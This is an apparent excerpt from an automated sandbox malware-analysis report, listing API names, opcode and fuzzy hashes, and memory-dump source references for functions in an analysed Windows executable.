                                                                      • API ID: Variant$Clear$ChangeInitType
                                                                      • String ID:
                                                                      • API String ID: 4136290138-0
                                                                      • Opcode ID: 5bf158a84cb56ccb7168b4d37c167f5e8b54303454597cac92653ddc8f5d8736
                                                                      • Instruction ID: f1285d3cdce68a7b24fee63ccefe2aee69eb21f73a97ecc121f2ec190b8f42b7
                                                                      • Opcode Fuzzy Hash: 5bf158a84cb56ccb7168b4d37c167f5e8b54303454597cac92653ddc8f5d8736
                                                                      • Instruction Fuzzy Hash: 0F514433624A8592EB10EF15D4847AE73B8FB84F94F828122CB4D83764EF39E458C751
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: 69caafc8f8afcb53c87a7f7053d9646584506dbe7d8e8e6cfd9f4db44817ad77
                                                                      • Instruction ID: f4ca755c7db3162ee382ae9f057693cea08b179a222c6583c45a978a027f2991
                                                                      • Opcode Fuzzy Hash: 69caafc8f8afcb53c87a7f7053d9646584506dbe7d8e8e6cfd9f4db44817ad77
                                                                      • Instruction Fuzzy Hash: DA51AE22A4878285EA61BF2194401B9F7A5EF44BB0F984239DF69877D4DF7CF441C3A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: PrivateProfile$SectionWrite$String
                                                                      • String ID:
                                                                      • API String ID: 2832842796-0
                                                                      • Opcode ID: 5ddcdf5be155bdd7fae183d3f61eaf0ee1945c0c2493d87505c57e9b0a69a627
                                                                      • Instruction ID: 3d5a0b79a3b47bb7d0c245c86aaf52c3e72086831b7ec4b77c1891e568a4e0f4
                                                                      • Opcode Fuzzy Hash: 5ddcdf5be155bdd7fae183d3f61eaf0ee1945c0c2493d87505c57e9b0a69a627
                                                                      • Instruction Fuzzy Hash: 3951FB36658A4682DB14FF26E490169A760FB88FA4F449432EF8E87766CF3CE440C790
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                      • String ID:
                                                                      • API String ID: 4210589936-0
                                                                      • Opcode ID: 66afa1c94deaf905156041cf676ffe3a2b02e9b0039980c06c23d4dff2918920
                                                                      • Instruction ID: 214f3cab2ad5bb61d9c48467dad790c1be95bc8d5253c316acab74d289eeb368
                                                                      • Opcode Fuzzy Hash: 66afa1c94deaf905156041cf676ffe3a2b02e9b0039980c06c23d4dff2918920
                                                                      • Instruction Fuzzy Hash: 3D51D032B086919BE794FF31C4405AEB761FB45B64F940231EA5A83795CF38F4918790
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc
                                                                      • String ID:
                                                                      • API String ID: 190572456-0
                                                                      • Opcode ID: a18f96543d52060ea1fb4eaea9751658dcb69330229f7bbe75e5b271c8b8e6e3
                                                                      • Instruction ID: 57ab5347b9fbb430e1b2f6ca9bfab74f0721367b9a636029c8bbaff26928aafc
                                                                      • Opcode Fuzzy Hash: a18f96543d52060ea1fb4eaea9751658dcb69330229f7bbe75e5b271c8b8e6e3
                                                                      • Instruction Fuzzy Hash: F3419061B49A8281EA15BF0A99042B5E395BF44BB0F894635DD1DCB398EF3CF44087A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Show$Enable
                                                                      • String ID:
                                                                      • API String ID: 2939132127-0
                                                                      • Opcode ID: c489c8d02495f69c1778672d4edb055e6fea3c7ece5ab9feb79cbeb3e5804fe0
                                                                      • Instruction ID: 65c117d54106136db9d1b6b7d36eee8c797969f8ed0bbd57f68ac9a20c85c751
                                                                      • Opcode Fuzzy Hash: c489c8d02495f69c1778672d4edb055e6fea3c7ece5ab9feb79cbeb3e5804fe0
                                                                      • Instruction Fuzzy Hash: 54513D32A0D68681EB519F55D454778B7A0FB84BA8FA84032CE4D873A0CF7DF485D7A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePostSleep$RectWindow
                                                                      • String ID:
                                                                      • API String ID: 3382505437-0
                                                                      • Opcode ID: 53e5e18aae174657f43a3affddf2552eb5f4829ae1ffd7803c72ea05724a17bc
                                                                      • Instruction ID: 593d49cf39cae7f5b5bb4b31d0dbb28c434230d33ed109c8459519c8ce5360c4
                                                                      • Opcode Fuzzy Hash: 53e5e18aae174657f43a3affddf2552eb5f4829ae1ffd7803c72ea05724a17bc
                                                                      • Instruction Fuzzy Hash: 9731C63660C64547E710EF59E44826AB3A1F788BA8F840235EE5DC7794DF7CF8418754
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                      • String ID:
                                                                      • API String ID: 2256411358-0
                                                                      • Opcode ID: c134d4337344e0b5e6f60fa6ff3406e13c81d8ed9a5a6472cdeb4b0526b89ef4
                                                                      • Instruction ID: 40215cb473619f6c58668e199d43f1c03215f35935e09939670abc3dd932677f
                                                                      • Opcode Fuzzy Hash: c134d4337344e0b5e6f60fa6ff3406e13c81d8ed9a5a6472cdeb4b0526b89ef4
                                                                      • Instruction Fuzzy Hash: D2416025D4C38285FB65BF249854B75A6A0EF84B68F9C0035E94DC63E5CF7CF48587A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindowwcsstr
                                                                      • String ID:
                                                                      • API String ID: 2655805287-0
                                                                      • Opcode ID: c96b3dee558e0f0e55b53f66a4f3d4a9b731c61fc9f957ff27ab50b26f9f0e0c
                                                                      • Instruction ID: daee6186356e2b1caa8f5114cbfc9528d7f5f0d1a679c9b77e4f558aee930415
                                                                      • Opcode Fuzzy Hash: c96b3dee558e0f0e55b53f66a4f3d4a9b731c61fc9f957ff27ab50b26f9f0e0c
                                                                      • Instruction Fuzzy Hash: EB21D322B4978286EB15BF26A904275E690BB89FF4F844531EE1D87795DF3CF4408390
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                      • String ID:
                                                                      • API String ID: 3225163088-0
                                                                      • Opcode ID: 8abe7a71c66bee896d504cb3d5ab816aa1492e552a9085df695a80683d63dbe3
                                                                      • Instruction ID: cd0cf26ce74221cb2ddc2e382f0e08f81b61cca66ca917e5d22e100de76504d2
                                                                      • Opcode Fuzzy Hash: 8abe7a71c66bee896d504cb3d5ab816aa1492e552a9085df695a80683d63dbe3
                                                                      • Instruction Fuzzy Hash: 07315831A1CB428AE340BF41A84473AF7A0FB85BA4FD44539DA4986750CF7CF4918BA0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ForegroundPixelRelease
                                                                      • String ID:
                                                                      • API String ID: 4156661090-0
                                                                      • Opcode ID: 0803af3d0555ee4f2e7cd4680bdbd11eb807c22797343ae4eaf726b5c3b1d4d7
                                                                      • Instruction ID: 7aec24da4cb9786efb664255574cf6dc3d584bcf37eb3b32150e5d131e74636d
                                                                      • Opcode Fuzzy Hash: 0803af3d0555ee4f2e7cd4680bdbd11eb807c22797343ae4eaf726b5c3b1d4d7
                                                                      • Instruction Fuzzy Hash: 78218626B08B5582E704FF26E44406DF3A0FB88FA4B484435DE5DC7755DF78E4818790
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 2067211477-0
                                                                      • Opcode ID: 6c75004fdc8f89f48edb4038dcc6ab145b99058f26a8cd052d9a22877b7c3d52
                                                                      • Instruction ID: 19fafa5c6858f540537bc3c1a7043e3bf7adcc94c94a4c4ab33715020d300649
                                                                      • Opcode Fuzzy Hash: 6c75004fdc8f89f48edb4038dcc6ab145b99058f26a8cd052d9a22877b7c3d52
                                                                      • Instruction Fuzzy Hash: DB216A25B4D7C286EE15FF69A41007AE2A4AF84FA4B884630EA0D87795DF6CF400C7A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      • Opcode ID: e270cafaa1c1bb403facffb31b6a836e27aa4e45b093d38abbba4bbe7c8013ef
                                                                      • Instruction ID: 9a55acea811b9de7c9db7aa8d352d8d325fae14ed4e23bfe331b47cd2076c539
                                                                      • Opcode Fuzzy Hash: e270cafaa1c1bb403facffb31b6a836e27aa4e45b093d38abbba4bbe7c8013ef
                                                                      • Instruction Fuzzy Hash: EE11C126E9CAA345F65C39ACE452375D0417F483B0F8543B0EA6EC67DA8F2CB84083A4
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_initialize_onexit_tables_invalid_parameter_noinfo_onexit_set_fmode
                                                                      • String ID:
                                                                      • API String ID: 2117695475-0
                                                                      • Opcode ID: c6240938d00ce931eff62a9f8efb7c75b2bc90d30c2bcb96158b33b23c092f9e
                                                                      • Instruction ID: ee066f066ae8b028c7c3f94dac5573c99d7111313f401c4b771d70e0ab86bfea
                                                                      • Opcode Fuzzy Hash: c6240938d00ce931eff62a9f8efb7c75b2bc90d30c2bcb96158b33b23c092f9e
                                                                      • Instruction Fuzzy Hash: FA117F82EC8A9745FA187FB8545A2B8D2914F85321FC80538E61DD63D3EF9CB44587F2
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 44706859-0
                                                                      • Opcode ID: 3045165107d4a0871487eb7a52e49b2bb276054106bd9f861ce7bf3483f017d6
                                                                      • Instruction ID: e1be05cb1a2f7393b0fe0ca125859f4bf6a9044a2ebea1f4c895835ff59c34a3
                                                                      • Opcode Fuzzy Hash: 3045165107d4a0871487eb7a52e49b2bb276054106bd9f861ce7bf3483f017d6
                                                                      • Instruction Fuzzy Hash: 9A113636608B82C6E710AF12E88455EB7B4FB88FA4F954535DF8883B14DF78F4568790
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 44706859-0
                                                                      • Opcode ID: 18e3121f69b2f55043958739cbc43e37301fc4036db83b04d1dc9e6091f96284
                                                                      • Instruction ID: 855f8ede5831fad993191b517f7ddc9a3527c80c5f71105a503d4a88a382be5d
                                                                      • Opcode Fuzzy Hash: 18e3121f69b2f55043958739cbc43e37301fc4036db83b04d1dc9e6091f96284
                                                                      • Instruction Fuzzy Hash: 8F116A36A08B42C6E710AF02E84415DB7A4FB88FA4F954536CF8993B14DF78F8558790
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 3897988419-0
                                                                      • Opcode ID: c2625648870bea748c00488204de808f07a4ef133cb019afb6ef5a542de6e20a
                                                                      • Instruction ID: 483f07f6b12ed028c7724e6db4f7e73a915676a37c1f645f75af907ab6f1e4dd
                                                                      • Opcode Fuzzy Hash: c2625648870bea748c00488204de808f07a4ef133cb019afb6ef5a542de6e20a
                                                                      • Instruction Fuzzy Hash: 8B112E26648A5186E710BF26E41032AA3A4FF85BD4F984235DE4D87758CF6DE4818B64
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                      • String ID:
                                                                      • API String ID: 3741023627-0
                                                                      • Opcode ID: 8c0ba02d18c33329f7d04451d21e8c8e2fc8c024a9545b6606e830f761915d0e
                                                                      • Instruction ID: b57739deefb7251c31c80e98425ddd6f07a51e81cb2287e9a197e77bf9cff569
                                                                      • Opcode Fuzzy Hash: 8c0ba02d18c33329f7d04451d21e8c8e2fc8c024a9545b6606e830f761915d0e
                                                                      • Instruction Fuzzy Hash: 7E11A921A0CA8681EB26BF24E444379A370FF44F58F848035DA8D96394DFBDE5C5C7A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                      • String ID:
                                                                      • API String ID: 2833360925-0
                                                                      • Opcode ID: e93a488e7ef773f4239d39afdac6f2cad4444a29d3dd75f0fed3b9e62e675ca8
                                                                      • Instruction ID: b0836961988aa8c91737ee2ae3c79a867b3096d8f6f9743870260aa965510ec0
                                                                      • Opcode Fuzzy Hash: e93a488e7ef773f4239d39afdac6f2cad4444a29d3dd75f0fed3b9e62e675ca8
                                                                      • Instruction Fuzzy Hash: 5801D422A0CA1242EF0ABF31A49503ED361BF95BB4B944239E10FD1761DF6EF4C5C6A0
                                                                      APIs
                                                                      • EnterCriticalSection.KERNEL32(?,?,?,00007FF7C0EB29AD,?,?,?,00007FF7C0E62AB2), ref: 00007FF7C0ED003C
                                                                      • TerminateThread.KERNEL32(?,?,?,00007FF7C0EB29AD,?,?,?,00007FF7C0E62AB2), ref: 00007FF7C0ED0047
                                                                      • WaitForSingleObject.KERNEL32(?,?,?,00007FF7C0EB29AD,?,?,?,00007FF7C0E62AB2), ref: 00007FF7C0ED0055
